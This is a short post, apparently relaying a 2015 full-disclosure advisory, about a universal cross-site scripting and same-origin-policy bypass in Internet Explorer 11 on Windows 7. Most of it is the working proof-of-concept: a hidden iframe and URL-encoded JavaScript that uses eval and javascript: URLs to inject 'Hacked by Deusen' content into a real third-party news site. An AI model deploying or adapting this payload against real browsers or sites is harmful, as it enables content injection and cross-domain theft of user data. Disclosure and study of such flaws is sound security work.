Internet Explorer Universal Cross Site Scripting
Major Internet Explorer Vulnerability: Universal Cross Site Scripting(XSS) with Same Origin Policy (SOP) bypass. Attackers can steal anything from another domain, and inject anything into another domain. Working onĀ Internet Explorer 11 Windows 7.
seclists.org/fulldisclosure/2015/Feb/0
http://www.deusen.co.uk/items/insider3show.3362009741042107/
<iframe style="display:none;" width=300 height=300 id=i name=i src="1.php"></iframe><br> <iframe width=300 height=100 frameBorder=0 src="http://www.dailymail.co.uk/robots.txt"></iframe><br> <script> function go() { w=window.frames[0]; w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1); } setTimeout("go()",1000); </script>